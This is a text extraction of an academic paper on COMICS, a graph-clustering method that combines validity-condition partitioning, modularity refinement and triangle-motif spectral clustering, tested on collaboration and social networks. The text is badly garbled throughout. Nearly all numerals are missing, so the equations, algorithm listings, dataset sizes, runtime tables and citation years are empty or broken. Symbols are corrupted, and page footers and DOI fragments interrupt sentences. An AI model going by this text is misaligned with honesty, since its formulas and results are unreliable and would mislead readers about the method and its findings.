graph g = (v, e), we define the adjacent matrix h = {hi,j} as: if there exists an edge between vertices i and j, hi,j = ; otherwise, hi,j = . network partition is defined as: p ¼ fg ; g ; . . . ; gkg; � k � jvj, subject to: ( ) sk k¼ gk ¼ v, ( ) gk \ gt ¼ [, ∀k s t, and ( ) gk ¼ [; k. for ∀k, the partition p satisfies the x—valid condition, called x—valid cluster partition of g, and x is defined as the following conditions according to lu et al. ( ): condition : x j gk hi;j > x j vngk hi;j; i gk; k: ( ) condition : x j gk hi;j > x j gt hi;j; i gk; k ¼ t: ( ) condition : x j gk hi;j > x i gk; j vngk hi;j; k: ( ) condition : x j gk hi;j > x i gk; j gt hi;j; k ¼ t: ( ) conditions and check the validity of clusters at the vertex level to confirm whether the internal degree of each vertex is larger than that of the external degree. conditions and check the validity of clusters, that is, comparing the total internal degree of each cluster. when large graphs are partitioned under the above-mentioned four conditions, condition generally results in fewer, but larger subgraphs; condition will lead to more and smaller communities; conditions and will cause more and smaller communities than condition , but fewer and larger communities than condition . definitions of network triangle motifs in real networks, the most common high-order structures are small network subgraphs, which are defined as motifs, that is, a set of edges with a small number of nodes. in this paper, we analyze undirected triangular motif-based networks. formally, we define a triangle motif by a tuple (b, a), where b is a � binary matrix and a � f ; ; � � � ; ng is the set of anchor nodes. the matrix b encodes the edge pattern between the three nodes in triangle motifs, and a represents a relevant subset of nodes to define motif conductance. then, let wa be a selection function, taking the subset of a -tuple induced by a. define set (·) as the operator, which takes a tuple to a set, set (v , v , v ) = {v , v , v }. then, the motif set of an unweighted and undirected graph with adjacency matrix a can be denoted by eq. ( ), where v s v s v , feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tri ðb; aÞ ¼ fset ðvÞ; set ðvaðvÞÞjv vk; av ¼ bg: ( ) here, av is the k � k adjacency matrix of the subgraph with k nodes of the order vector v. in this paper, the motifs are undirected and unweighted. the matrix b of motif is symmetrical. hence, we use (v, wa(v)) to denote (set (v), set (wa(v))) for convenience. furthermore, we regard any (v, wa(v)) ∈ tri (b, a) as a motif instance. if a and b are arbitrary or clear from context, we simply denote the motif set by tri. we define the motifs, that is, wa(v) = v, as simple motifs, and others are anchor motifs. we give an example of triangle motif definition, as shown in fig. , aiming to cluster the given five-node network by the two triangle motifs. first, we define the motifs by the description in eq. ( ). for motif tri , there are two instances of the motifs in g. meanwhile, for motif tri , g has three instances, and the anchor sets of each instance is the node whose degree is one. the definition of the triangle motif conductance replaces an edge with a motif instance of type tri. we suppose that a given network has been clustered into two subnetworks, that is, g and �g, and the conductance based on motifs can be expressed in eq. ( ), c ðgÞ tri ðsÞ ¼ ðcutðgÞtri ðg; �gÞÞ minðvolðgÞtri ðgÞ; vol ðgÞ tri ð�gÞÞ : ( ) when there is at least one anchor node in s and at least one anchor node exists in �g, a motif instance can be cut. in eq. ( ), cut ðgÞ tri ðg; �gÞ is the number of instance cut. vol ðgÞ tri ðgÞ is the number of instances, whose end nodes are in g. to be more specific, following the definition of tri in eq. ( ), as for the same wa(v), there may exist many different values of v, and nodes in wa(v) are still counted proportionally into the number of motif instances. this growth tendency of motifs is consistent with the number of nodes in networks. this can prove the availability of motifs in clustering networks. definition of motif-base matrices given a graph and a set of motif tri, the motif adjacency matrix wtri of graph is shown as: ðwtriÞij ¼ x ððv;vaðvÞÞ triÞ ðfi; jg � vaðvÞji ¼ jÞ: ( ) herein, (wtri)ij is the number of motif instances in m, where nodes i and j are both in a triangle motif. in other words, the weight will be added into (wtri)ij if and only if node i figure example of motif definition in diagram: the motifs tri and tri are leveraged to detect in the five-node graph g on the left figure. the motifs are defined by a binary matrix b and an anchor set of nodes. b and b are the binary matrices of tri and tri , respectively. similarly, a and a are the anchor node sets of tri and tri , respectively. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and node j both appear in the anchor set. in the collaboration networks, (wtri)ij depends on the number of scholars, who collaborate with both scholar i and scholar j. then, the motif diagonal degree matrix dm is defined as ðdtriÞii ¼ pn j¼ ðwtriÞij. the motif laplacian can be calculated by ltri = dtri - wtri. finally, we normalize the motif laplacian as: �tri ¼ i � d� = tri wtrid � = tri : ( ) problem statement let g = (v, e) be a connected large network, where v is the node set, and e is the edge set. if g contains several disjoint networks, it can be expressed as g = {g , g , ⋯, gn}. the complete triangle is the target motif to analyze the large-scale networks. our objective is to find the dense and stable disjoined subgraph set p ¼ fg ; g ; . .. ; g mg of the given network by motifs. given a node v ∈ v in the network gi ∈ g, the degree of v is denoted by deg(v) and the neighbor node set of the subgraph gi in the original networks is denoted by ngi. in the partition phase, gi can be cutted into a set of subgraphs, g i ; g i ; . . . ; g ikf g. for a node v in a partition subgraph g ij of gi, we use deginter(v) and degextra(v) to represent the degree within g ij and the number of edges between g ij and gi=g ij, respectively. con(g ij) is the set of subgraphs that are connected with g ij in the partition p. variable q is the modularity score when the original graph g gets the partition p. in the process of graph partition, we cut the original networks into initial subgraphs under the four conditions. in that way, the network can be cutted into subgraphs with strong internal connectivity and weak external connectivity in both local and global aspects. the modularity score refining subprocedure can optimize the partition. then, we cluster and analyze the initial dense subgraphs by the complete triangle motif. comics algorithm in this section, we describe the whole process of our comics in details. as shown in fig. , comics consists of a series of partition refine strategies and a motif-based clustering procedure, that is, graph partition, modularity refine procedure and motif-based figure architecture of comics. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ clustering procedure. we first illustrate the graph partition techniques under four conditions and the modularity refine procedure in algorithm . after that, the motif-based clustering procedure is constructed on each subgraph in cutting set. we specify the whole clustering layer algorithm in algorithm , by which we are able to get the close and stable subgraph structures from the original input networks. graph partition and modularity refine procedures to obtain the total information of large networks effectively, we first perform cutting operations in large networks. in this subsection, we explain the graph partition and modularity refine procedures in details. we use the total large graph as the input of the partition procedure, and the procedure returns a set of partition subgraphs of the original graph. the subgraph set is refined in the modularity refine procedure by modularity score. in the graph partition procedure, we take the differences between the internal and external degrees as the degree difference value of a node v, denoted by d(v), that is, dðvÞ ¼ deginterðvÞ � degextraðvÞ: ( ) for all pairs of nodes v and u in networks, if nodes v and u fall in the same subgraph, the quantity of svsu is , otherwise, it equals to - . |e| is the total number of edges in the original network. the value of ev, u is , if there exists one edge between nodes v and u, otherwise it is . therefore, the modularity score of a network is defined as eq. ( ): q ¼ jej x v;u � ev;u � deg vð Þdeg uð Þ jej � ðsvsu þ Þ: ( ) algorithm graph partition algorithm input: large graph g, conditions output: r: a partition set p of g : add g to r : while |r| increases and rj j ¼ do : for each subgraph gi in r do : \\ rootg ij is a node from gi. a new subgraph g ij can be generated from gi with rootg ij . : rootg ij ¼ argmin v v deg vð Þf g : for node v in nðg ijÞ do : if v satisfies the given conditions then : add node to g ij : else : rootg ij ¼ argmin v v d vð Þf g : end if : end for : make the partition g ij=gi; gi � � : end for : end while : return r feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as described in algorithm , we take the large networks and the cutting conditions as the input of the graph partition procedure. at the beginning of this procedure, there is only one original graph added in the result partition set r. the number of subgraphs in r is represented as |r|. in each outer loop, each subgraph gi is chosen to generate new subgraphs, g ij. hence, the root node of the new subgraph g ij is selected randomly among the nodes that are with the minimum degree of the new subgraph in r. as described in lines – , the loop aims to generate the new graph from the root node from gi. if at least one neighbor node of the total new subgraph satisfies the validity of the input conditions, the neighbor node is added to the new subgraph g ij with its connectivity; otherwise, it means that there is no neighbor with this root node, and we select a new node in gi as the root to check the connectivity with the original network. the node with the minimum difference between the internal and external degrees will be the root node of g ij. then, graph partition operations will be carried until no other nodes from the original networks satisfy the cutting condition. in line of algorithm , there are two cases when selecting a new root node of the new subgraph: one is that the root node selected in line or line has no neighbor, that is, the degree of root node is . it indicates the root node vroot is invalid, and no new subgraph can be added into r. the other situation is that there is no node in g connected with the partition subgraph. in other words, the iteration of adding nodes to the new subgraph stops. then a new subgraph generated by the root node vroot is added to the subgraph set r. the iteration of the partition procedure stops when the number of subgraphs in r does not increase any more. however, if there exists one graph in r all the time, it illustrates that the root node with the minimum degree is invalid, and we have to choose another root node and restart the iteration. algorithm cuts large graph into small dense subgraphs. each loop generates a new subgraph from set r, and the loop stops when no more dense subgraph can be found. to avoid damaging the connectivity of the rest nodes, we check the connectivity of both cutting and remaining parts, if there exists more than one component, we put all subgraphs in set r to the modularity refine procedure in algorithm . the modularity refine procedure described in algorithm takes the results of the algorithm as input to refine the partition results of the original networks. as shown in algorithm , lines and enumerate two connected subgraphs: g ij and g ik in r. in the following line to line , if the two subgraphs are combined to one, it results in much higher modularity score than the original network partition. then we replace g ij and g ik by g ij [ g ik, and the iteration stops until the modularity scores do not increase any more. variable r is the result set of algorithm , containing a series of refined subgraphs. this procedure of graph partition aims to maintain more structure information of the original large-scare networks, so that the output partition by algorithm can achieve higher modularity score than the input subgraph set. the operation of merging these two cutting subgraphs increases the internal degrees. merging two subgraphs into one can also decrease the external degree for the subgraphs in partition p. if two subgraphs can be merged, the number of edges between them is larger than that cannot be feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ merged. then as long as the two subgraphs are merged, the external degree of the input network can be reduced. triangle motif-based clustering procedure we take the subgraph set of the original network as the input of the motif-based clustering procedure. as shown in algorithm , its main idea is to find a single cluster in a graph by leveraging target motifs. in this procedure, we cluster the subgraphs in r by the minimum conductance, aiming to find the most stable part with the highest conductance of the given subgraph. the algorithm outputs a partition of nodes in g and �g. the motif conductance is symmetric in the sense that c ðgÞ tri ðgnodeÞ ¼ c ðgÞ tri ð�gnodeÞ, so that any set of nodes (g and �g) can be interpreted as a cluster. however, it is common that one set is substantially smaller than the other in practice. we take the larger set as a module in the network. some networks are clustered for specific motivations, such as mining the relationships of a person in the social networks. in that case, algorithm takes the larger part in the clustering results g and �g as the cluster results as shown from line to line . in the process of the motif-based clustering, we take the target motif and a subgraph partitioned in r (the output of algorithm ) as the input. as shown in fig. , for a given graph and a target motif, we calculate a series of matrices, that is, wtri, dtri, and �tri, before weighting the input graph of matrix wtri. therefore, the graph is cut by the minimum conductance c ðgÞ tri expressed in eq. ( ). in line of algorithm , the value of c ðgÞ tri is determined by a series of sorted eigenvalues of the subgraph’s motif laplacian matrix �tri. between the two cut subgraphs of the input graph, the larger one will be chosen as the output result. combined comics algorithm in this subsection, we describe the overall algorithm of comics in algorithm . it combines all three subprocedures in this subsection. algorithm modularity refine algorithm input: subgraphs set r, empty set r output: refined subgraphs set r : for g ij in r do : for g ik in con gijð Þ do : if q g ij [ g ik � � > q g ij � � then : g ij ¼ g ij [ g ik : remove gij and g ik from r : add g ij to r : end if : end for : end for : return r feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we take the large-scale networks, target motifs and the given validity conditions as the algorithm input, and obtain the clustering set of the original input network. at beginning, a series of partition and refining operations are carried on input networks under the valid conditions. then we get a partition with high modularity scores of the original input large networks. each subgraph in the partition set has a strong internal connectivity and a weak external connectivity, maintaining the stable structure information of the original network. furthermore, we carry the motif-based clustering operations on the subgraph in the partition set. finally, we can get the non-overlapping optimal partition of the original graph. time complexity analysis in this section, we analyze the time complexity of comics. the main clustering layer includes the following three phases: graph partition, graph refining and motif-clustering. algorithm triangle motif-based clustering algorithm input: graph g and motif tri output: subgraph set of the original network : (wtri)ij = number of triangle motif instances of tri : gtri ) weighted graph induced wtri : dtri = diagonal matrix with ðdtriÞii ¼ pn j¼ ðwtriÞij : �tri ¼ i � d� = tri wtrid � = tri : z = eigenvector of second smallest eigenvalue for �tri : ri = to be the index of d ðð� Þ= Þ tri : z = ith smallest value : g ¼ argminl cðgÞtri ðglnodeÞ; where l ¼ s ; � � � ; sk : if gj j > �gj j then : return g : else : return �g : end if figure triangle motif-based clustering of comics. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we assume m and n as the number of edges and nodes in the network. here, d(v) is the degree of node v and dmax is the maximal degree in the network. graph partition procedure: to get and parse the information from large networks effectively, we first apply cutting operations on the large-scale networks. we analyze the worst case of the graph partition subprocedure. in the first cutting iteration, the root node is one of the nodes with the smallest degree in the graph, and its time complexity is o(n). for each new subgraph g generated by root node v, we check the connectivity of the new-added nodes, including the internal and external links with subgraph g and check the corresponding conditions before partitioning. the time complexity of this procedure is oðn d maxÞ. modularity refining procedure: in the subgraph refining procedure, we use modularity score q (newman, ) to get a suitable partition. the required time of iterations is up to the number of subgraphs in the result sets r, which are generated by the graph partition procedure. we define the number of subgraphs in r as p, and the runtime of the procedure is determined by the step of calculating q, whose computation complexity is o[(m + n)n]. because the first refining subgraph need to check the other p - subgraphs and the second one checks the remaining p - . hence, the total checking times is p / . therefore, the computation complexity of the refining procedure is o[p (m + n)n/ ]. triangle motif-based clustering procedure: in general, the time complexity of the algorithm is determined by the construction of the adjacency matrix and the solution of the eigenvector. for simplicity, we consider that we can access network edges within o( ), and modify matrix entries within o( ). the complexity of calculating the eigenvectors through laplacian matrix is o((m + n) (log n)o( )), and sorting the eigenvector indexes can be finished in time o(n log n). for a motif with three nodes, we can compute wm in �(n ) in a complete graph with n nodes. therefore, the computation complexity of the motif-based analysis procedure is o(n ). according to the description above, the time complexity of comics is o(rn ), where r is the number of subgraphs in the partition set r, and n is the number of nodes. experiments in this section, we compare comics with k-means and co-authorship team detection algorithm from the perspectives of network clustering accuracy and time complexity, algorithm combined comics algorithm input: large graph g, conditions and motif tri output: motif-based cluster set (subset of nodes in g) : set r as an empty set : r = graph partition algorithm(g, conditions) : r = modularity refine algorithm(r) : for g in r do : g = triangle motif-based clustering algorithm(g, tri) : add g to r : end for : return r feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ respectively. we choose four large-scale networks, including two social network, that is, facebook and gemsec-deezer data sets (leskovec & krevl, ; rozemberczki et al., ) and two academic collaboration networks, that is, aps and mag data sets. we analyze the accuracy of the clustering results by calculating compactness and separation. we demonstrate the efficiency of our solution in both academic collaboration and social networks. we also consider other statistical data information of academic networks, tcvs, tpvs, and msv. all those corresponding metrics are illustrated in this section. all experiments are conducted on a desktop with intel(r) xeon(r) cpu e - v @ . ghz (two processors) and gb memory. the operating system is window , and the codes are written in python. the american physical society data set ( – ) consists of , papers associated with , scholars in the physical field. meanwhile, the mag data set ( – ) on computer science includes , scholars with , papers in the computer science area. edges in the academic networks represent two authors have coauthored at least one paper. the facebook social network data set in our experiments contains eight networks, , nodes and , , edges. we list the eight social networks in table . in that case, we cluster the social networks by the different categories listed in the data set. gemsec-deezer data set collected by deezer (november ) is also experimentalized in this paper. this data set contains , nodes and , edges from three countries, romania ( , nodes and , edges), croatia ( , nodes and , edges) and hungray ( , nodes and , edges). experiment settings in this subsection, we describe the settings of our experiments from three aspects, that is, time cost, clustering accuracy and academic teamwork behavior analysis with complete triangle motif in academic areas. in academic collaboration networks, we consider two algorithms. the facebook social networks do not contain any statistical information. therefore, we merely compare our method with k-means algorithm in the social network: k-means clustering algorithm (ding & he, ): this method proves that principal components are the continuous solutions to cluster membership indicators for k-means clustering. it takes principal component analysis into the clustering process, which is suitable for the scholar science and social data sets. co-authorship algorithm (reyes-gonzalez, gonzalez-brambila & veloso, ): this algorithm considers all the principal investigators and collaborators, and defines table facebook date sets. tv shows politician government public figures node , , , , edge , , , , athletes company new sites artist node , , , , edge , , , , feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ knowledge footprints of the groups to calculate the distances between scholars and the group. based on the distance, the academic groups can be detected in an accurate way. this method iterates all the researchers with their collaborator and institution similarities until they are assigned to a academic team can be applied to understand the self-organizing of research teams and obtain the better assessment of their performances. to demonstrate the runtime efficiency and the accuracy of our clustering results in large-scale networks, we divide the aps and mag data sets into different parts with various sizes by years, respectively, so that we can get the collaboration networks with distinct number of nodes (from , to , ). considering the integrality and veracity of the academic research teams in data sets, we take the whole aps and mag data sets as the collaboration networks to detect the collaborative relationships. evaluation metrics to evaluate and analyze the accuracy of network clustering results of our proposed comics, we use two metrics, that is, compactness and separation, to evaluate node closeness in clustering results and the distances among clusters. in academic collaboration networks, we combine the statistical paper publishing data with network structures together, and calculate three metrics to find the characteristics discovered through the target triangle motif to uncover the hidden collaboration patterns and teamwork of scholars in academic networks. compactness and separation (halkidi, batistakis & vazirgiannis, ) are used to evaluate the accuracy of clustering results by different methods. compactness is a widely used metric to quantify the tightness of clustering subgraphs, representing the distances between nodes in a subgraph. separation calculates the distances among the cores of different subgraphs. that is, if a clustering subgraph is with lower compactness value and higher separation value, the subgraph can be detected effectively. compactness is expressed by eq. ( ), compactness ¼ rj j x vi � vi � wj j: ( ) here, r is the clustering result set, vi is one of the nodes in the subgraph, and w is defined as the core of the subgraph cluster, because w is the node with the maximum degree in a cluster. the value of |vi - w| means the shortest distance between node vi and the cluster core node w. sp is defined as in eq. ( ). separation ¼ k � k xk i¼ xk j¼iþ jwi � wjj; ( ) wherein, k is the number of subgraphs in the result set and wi is the core of the given subgraph i, which is the same as wj. the value of |wi - wj| equals to the shortest distance between wi and wj. knowledge footprints of a group are the union of all the backward citations used by group members in all of their papers within a specific time period. feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in collaboration networks, we assume the clusters as academic teams, in which scholars work together. therefore, three metrics are defined to analyze the collaboration behaviors through triangle motif: tcv, tpv, and msv. tcv: this metric reflects the tightness and volatility among members in a team. for one scholar i in a team, we define the tcv as follows, sco ¼ pn i ðcoi � coaveÞ n : ( ) herein, n is the number of team members, coi is the number of scholars that scholar i has collaborated within the same team, and coave is the average number of collaborators collaborated with scholars in a team. tpv: an academic team with high performance refers that the members in team have published a large number of paper. similarly, in a stable team, the gaps of published paper numbers among team members are small. to evaluate the academic levels and stability of a team, we define tpv as follows: sqtt ¼ pn i ðqi � qaveÞ n ; ( ) where sqtt means scholar i’s variance of publishing papers in the detected team, qi is the number of papers that scholar i has published, and qave is the average number of papers in the team. msv: this metric calculates the difference of motif number that the scholar nodes are included in the collaboration networks. we define the msv as follows, sprimitive ¼ pn i ðti � taveÞ n : ( ) herein, ti is the number of target motif that scholar i owns, and tave is the average motifs of a team. to uncover the collaboration patterns mined by triangle motifs among scholars in academic teams, we use the above three arguments to analyze relationships between productions and motifs of the clustered academic teams. results and discussion in this section, we evaluate the experimental results by comparing with k-means and co-authorship algorithm in both runtime and the effectiveness. in the view of internal and external connections, we calculate compactness and separation values for each algorithm results. the time cost results of three networks are shown in tables – , respectively. “k” in the tables represents thousand, for example, “ k” means a network with one thousand nodes. n/a means that the clustering procedure takes more than days. according to tables – , it can be concluded that, in small networks (less than , nodes), the three methods make little differences in running time. however, as the size of network increases, our clustering algorithm costs the least time. the time costs in feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ different data sets make little differences. however, the results show the same trend and the proposed method takes more time in small networks and outperforms other large networks. as shown in tables and , when academic collaboration networks contain more than , nodes, comics takes the least time than the other two algorithms. more than that, in social networks, the time cost of our method is also satisfied in large size networks. therefore, it can be concluded that though the partition operations cost a table aps runtime. comics co-authorship k-means k . s . s . s k . s . s . s k , . s , . s . h k . h , . s . h k . h . h . h k . h . h > h k . h . h > h k . h > h n/a table mag runtime. comics co-authorship k-means k . s . s . s k . s . s . s k , . s . s . h k . h , . s . h k . h . h . h k . h . h > h k . h . h > h k . h . h n/a k . h > h n/a table social network runtime. comics k-means tv shows . s . s politician , . s . s government . h . h public figures . h . h athletes . h . h company . h . h new sites . h . h artist . h . h romania . h . h hungray . h . h croatia . h . h feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lot of time, it is necessary to apply the speeding up techniques in clustering. moreover, for different types of networks, topological structures, density are also vital factors that can effect the clustering procedures and results. figures a and a show the compactness values generated by our algorithm and the comparing algorithms on different sizes of networks, respectively. as the figures show, in collaboration networks, compactness values corresponding to different networks are lower than those in co-authorship algorithm and k-means algorithm, which are similar with that in social networks. our algorithm performs better than the two comparing algorithms. figures b and b plot the separation values of the three algorithms with the network growth in both academic, facebook social and gemsec-deezer networks. it can be seen that with the growing network size, comics achieves the highest separation values. this means subgraphs clustered by our method have greater separation values all the time. according to figs. b and b, we can conclude that the distances among core nodes in each cluster are close no matter what algorithms are used. the reason is that no matter what algorithms are used in the target network, the core nodes of clusters are almost the same. all the core nodes are with the maximum degrees. in all, our clustering algorithm achieves the best subgraph clustering results obviously. analysis in academic collaboration networks after analyzing the time complexity and effectiveness of our system above, in this subsection, we analyze the clustering results with the triangle motifs in academic collaboration networks. the results prove the triangle motif structures can reflect the hidden statistical information and connections with network structures. for example, as the analysis results show, collaboration patterns as well as the correlations of network structure and team productions can be summarized in the academic collaboration networks. we regard the cluster results of each academic collaboration network as an academic team. then the values of three variances, that is, tpv, tcv, and msv are calculated, and the results are shown in figs. a and b. hence, we can see that the number of high-order triangle motif can reflect the performance of an academic team to some extent. figure the variation tendency of compactness and separation values of collaboration network clustering results with comics, co-authorship and k-means algorithms. (a) compactness in aca- demic collaboration networks and (b) separation in academic collaboration networks. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ according to figs. a and b, we conclude that the tpv and tcv are both proportional to the msv. meanwhile, the tpv is also approximately positive linear with the msv. that means, the lower the msv is in a cluster team, the performance of team members are in smaller gaps. therefore, it can be concluded that the value of msv can reflect the gap of collaboration relationships in teams and performance of team members. however, we can infer that the scholars with few number of complete triangle motifs, have collaborated with only few scholars in the team. those scholars are probably students or new team members, resulting in the high collaboration and paper variances. hence, in collaboration networks, we can use msv to evaluate the gaps of team collaboration relationships and the performance of team members. the two teamwork gaps in different periods represent the stability and volatility of academic teams. conclusion in this paper, we put forth the high-order motif-based clustering system to get a subgraph set from the large-scale networks. in the constructed system, we take graph partition and refining techniques to speed up algorithm runtime. through network cutting, we check the figure the variation tendency of compactness and separation values of the clustering results in social networks with comics and k-means algorithms. (a) compactness in social networks and (b) separation in social networks. full-size doi: . /peerj-cs. /fig- figure positive relations in collaboration networks through collaboration variances, paper variances and motif variances of each clustering. red rectangles and blue triangles represent the col- laboration academic teams clustered from mag and aps data sets, respectively. (a) relationships between tcv and msv and (b) relationships between tpv and msv. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ four cutting conditions from the aspect of network connectivity, which can prevent damaging the global structures of large-scale networks. experiments are carried on four large networks, that is, aps and mag from the academic area, facebook and gecsec-deezer networks from the social area, respectively. the results demonstrate the effectiveness of our method in time cost and accuracy in large-scale network clustering. furthermore, the collaboration teamwork analysis verifies the availability of complete triangle motif, which represents the smallest collaboration unit in the collaboration networks. we analyze the collaboration clustering results with three metrics, that is, tcv, tpv, and msv. the results show that both tcv and tpv are proportional to msv. therefore, it can be concluded that the value of msv can reflect the two gaps, that is, collaborative relationships and performance of different team members. besides, the two gaps in different periods can also reflect the dynamic change of team members. in the future, we will focus on dynamic motif clustering for real-time network management (ning et al., ; ning, huang & wang, ; wang et al., a). in addition, network security (wang et al., b, ) and crowdsourcing based methods (ning et al., a, b) also deserve to be investigated. additional information and declarations funding this work is supported by china postdoctoral science foundation under grant t and state key laboratory for novel software technology, nanjing university, under grant kfkt b . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: china postdoctoral science foundation: t . state key laboratory for novel software technology, nanjing university: kfkt b . competing interests the authors declare that they have no competing interests. author contributions � yufan feng conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. � shuo yu conceived and designed the experiments. � kaiyuan zhang analyzed the data, contributed reagents/materials/analysis tools, performed the computation work. � xiangli li performed the experiments, analyzed the data, performed the computation work. � zhaolong ning conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: data is available through the american physical society (aps) and microsoft academic graph (mag). specifically: facebook network data can be found here: http://snap.stanford.edu/data/ego-facebook.html. gemsec-deezer network data can be found here: http://snap.stanford.edu/data/gemsec- deezer.html. code can be found here: https://github.com/yffre/comics. references bagrow jp. . evaluating local community methods in networks. journal of statistical mechanics: theory and experiment ( ):p doi . / - / / /p . barjak f, robinson s. . international collaboration, mobility and team diversity in the life sciences: impact on research performance. social geography ( ): – doi . /sg- - - . benson ar, gleich df, leskovec j. . higher-order organization of complex networks. science ( ): – doi . /science.aad . bian x, zhang k. . modeling network with topic model and triangle motif. in: ubiquitous intelligence and computing and ieee international conference on autonomic and trusted computing and ieee international conference on scalable computing and communications and its associated workshops, piscataway: ieee, – . bordons m, gomez i, fernández m, zulueta m, méndez a. . local, domestic and international scientific collaboration in biomedical research. scientometrics ( ): – doi . /bf . cai q, gong m, ma l, ruan s, yuan f, jiao l. . greedy discrete particle swarm optimization for large-scale social network clustering. information sciences : – doi . /j.ins. . . . ding c, he x. . k-means clustering via principal component analysis. in: proceedings of the twenty-first international conference on machine learning. banff, alberta: acm, . du n, wu b, pei x, wang b, xu l. . community detection in large-scale social networks. in: proceedings of the th webkdd and st sna-kdd workshop on web mining and social network analysis. new york: acm, – . girvan m, newman me. . community structure in social and biological networks. proceedings of the national academy of sciences of the united states of america ( ): – . gong m, ma l, zhang q, jiao l. . community detection in networks by using multiobjective evolutionary algorithm with decomposition. physica a: statistical mechanics and its applications ( ): – doi . /j.physa. . . . halkidi m, batistakis y, vazirgiannis m. . clustering validity checking methods: part ii. acm sigmod record ( ): – doi . / . . khan s, liu x, shakil ka, alam m. . a survey on scholarly data: from big data perspective. information processing & management ( ): – doi . /j.ipm. . . . koll d, li j, fu x. . with a little help from my friends: replica placement in decentralized online social networks. technical report tr-ifi-tb- - , university of goettingen, germany. feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://snap.stanford.edu/data/ego-facebook.html http://snap.stanford.edu/data/gemsec-deezer.html http://snap.stanford.edu/data/gemsec-deezer.html https://github.com/yffre/comics http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . /sg- - - http://dx.doi.org/ . /science.aad http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.ipm. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee jr, gharan so, trevisan l. . multiway spectral partitioning and higher-order cheeger inequalities. journal of the acm ( ): – doi . / . leskovec j, krevl a. . snap datasets: stanford large network dataset collection. available at http://snap.stanford.edu/data. leskovec j, lang kj, dasgupta a, mahoney mw. . community structure in large networks: natural cluster sizes and the absence of large well-defined clusters. internet mathematics ( ): – doi . / . . . li p, chen k, ge y, zhang k, small m. a. bipartite centrality diffusion: mining higher-order network structures via motif-vertex interactions. epl (europhysics letters) ( ): doi . / - / / . li p, dau h, puleo g, milenkovic o. b. motif clustering and overlapping clustering for social network analysis. in: ieee infocom —ieee conference on computer communications, piscataway: ieee, – doi . /infocom. . . li z, liu j. . a multi-agent genetic algorithm for community detection in complex networks. physica a: statistical mechanics and its applications : – . li p, milenkovic o. . inhomogeneous hypergraph clustering with applications. in: guyon i, luxburg uv, bengio s, wallach h, fergus r, vishwanathan s, garnett r, eds. advances in neural information processing systems . long beach: curran associates, inc., – . li p, milenkovic o. . submodular hypergraphs: p-laplacians, cheeger inequalities and spectral clustering. arxiv e-prints. louis a. . hypergraph markov operators, eigenvalues and approximation algorithms. in: proceedings of the forty-seventh annual acm symposium on theory of computing, stoc ‘ . new york: acm, – . lu z, wu w, chen w, zhong j, bi y, gao z. . the maximum community partition problem in networks. discrete mathematics, algorithms and applications ( ): doi . /s . luo f, wang jz, promislow e. . exploring local community structures in large networks. web intelligence and agent systems: an international journal ( ): – . ma l, huang h, he q, chiew k, liu z. . toward seed-insensitive solutions to local community detection. journal of intelligent information systems ( ): – doi . /s - - - . milo r, shen-orr s, itzkovitz s, kashtan n, chklovskii d, alon u. . network motifs: simple building blocks of complex networks. science ( ): – doi . /science. . . . monti f, otness k, bronstein mm. . motifnet: a motif-based graph convolutional network for directed graphs. arxiv preprint doi . /dsw. . . newman me. . modularity and community structure in networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . ning z, dong p, kong x, xia f. . a cooperative partial computation offloading scheme for mobile edge computing enabled internet of things. ieee internet of things journal doi . /jiot. . . ning z, huang j, wang x. . vehicular fog computing: enabling real-time traffic management for smart cities. ieee wireless communications ( ): – doi . /mwc. . . ning z, kong x, xia f, hou w, wang x. a. green and sustainable cloud of things: enabling collaborative edge computing. ieee communications magazine ( ): – doi . /mcom. . . feng et al. ( ), peerj 